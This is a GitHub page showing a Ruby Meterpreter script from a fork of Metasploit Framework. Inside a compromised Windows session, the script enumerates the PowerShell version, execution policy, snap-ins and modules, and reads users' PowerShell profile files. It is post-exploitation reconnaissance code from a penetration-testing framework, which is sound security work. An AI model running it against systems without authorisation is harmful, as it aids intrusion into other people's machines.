forked from rapid7/metasploit-framework
-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathenum_powershell_env.rb
125 lines (115 loc) · 4.34 KB
/
enum_powershell_env.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
#Meterpreter script for enumerating Microsoft Powershell settings.
#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
@client = client
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false,"Help menu." ]
)
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-h"
print_line("enum_scripting_env -- Enumerates PowerShell and WSH Configurations")
print_line("USAGE: run enum_scripting_env")
print_line(@@exec_opts.usage)
raise Rex::Script::Completed
end
}
#Support Functions
#-------------------------------------------------------------------------------
def enum_users
os = @client.sys.config.sysinfo['OS']
users = []
user = @client.sys.config.getuid
path4users = ""
sysdrv = @client.sys.config.getenv('SystemDrive')
if os =~ /Windows 7|Vista|2008/
path4users = sysdrv + "\\Users\\"
profilepath = "\\Documents\\WindowsPowerShell\\"
else
path4users = sysdrv + "\\Documents and Settings\\"
profilepath = "\\My Documents\\WindowsPowerShell\\"
end
if is_system?
print_status("Running as SYSTEM extracting user list..")
@client.fs.dir.foreach(path4users) do |u|
userinfo = {}
next if u =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
userinfo['username'] = u
userinfo['userappdata'] = path4users + u + profilepath
users << userinfo
end
else
userinfo = {}
uservar = @client.sys.config.getenv('USERNAME')
userinfo['username'] = uservar
userinfo['userappdata'] = path4users + uservar + profilepath
users << userinfo
end
return users
end
#-------------------------------------------------------------------------------
def enum_powershell
#Check if PowerShell is Installed
if registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\").include?("PowerShell")
print_status("Powershell is Installed on this system.")
powershell_version = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellEngine","PowerShellVersion")
print_status("Version: #{powershell_version}")
#Get PowerShell Execution Policy
begin
powershell_policy = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell","ExecutionPolicy")
rescue
powershell_policy = "Restricted"
end
print_status("Execution Policy: #{powershell_policy}")
powershell_path = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell","Path")
print_status("Path: #{powershell_path}")
if registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1").include?("PowerShellSnapIns")
print_status("Powershell Snap-Ins:")
registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellSnapIns").each do |si|
print_status("\tSnap-In: #{si}")
registry_enumvals("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellSnapIns\\#{si}").each do |v|
print_status("\t\t#{v}: #{registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowerShellSnapIns\\#{si}",v)}")
end
end
else
print_status("No PowerShell Snap-Ins are installed")
end
if powershell_version =~ /2./
print_status("Powershell Modules:")
powershell_module_path = @client.sys.config.getenv('PSModulePath')
@client.fs.dir.foreach(powershell_module_path) do |m|
next if m =~ /^(\.|\.\.)$/
print_status("\t#{m}")
end
end
tmpout = []
print_status("Checking if users have Powershell profiles")
enum_users.each do |u|
print_status("Checking #{u['username']}")
begin
@client.fs.dir.foreach(u["userappdata"]) do |p|
next if p =~ /^(\.|\.\.)$/
if p =~ /Microsoft.PowerShell_profile.ps1/
ps_profile = session.fs.file.new("#{u["userappdata"]}Microsoft.PowerShell_profile.ps1", "rb")
until ps_profile.eof?
tmpout << ps_profile.read
end
ps_profile.close
if tmpout.length == 1
print_status("Profile for #{u["username"]} not empty, it contains:")
tmpout.each do |l|
print_status("\t#{l.strip}")
end
end
end
end
rescue
end
end
end
end
if client.platform =~ /win32|win64/
enum_powershell
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end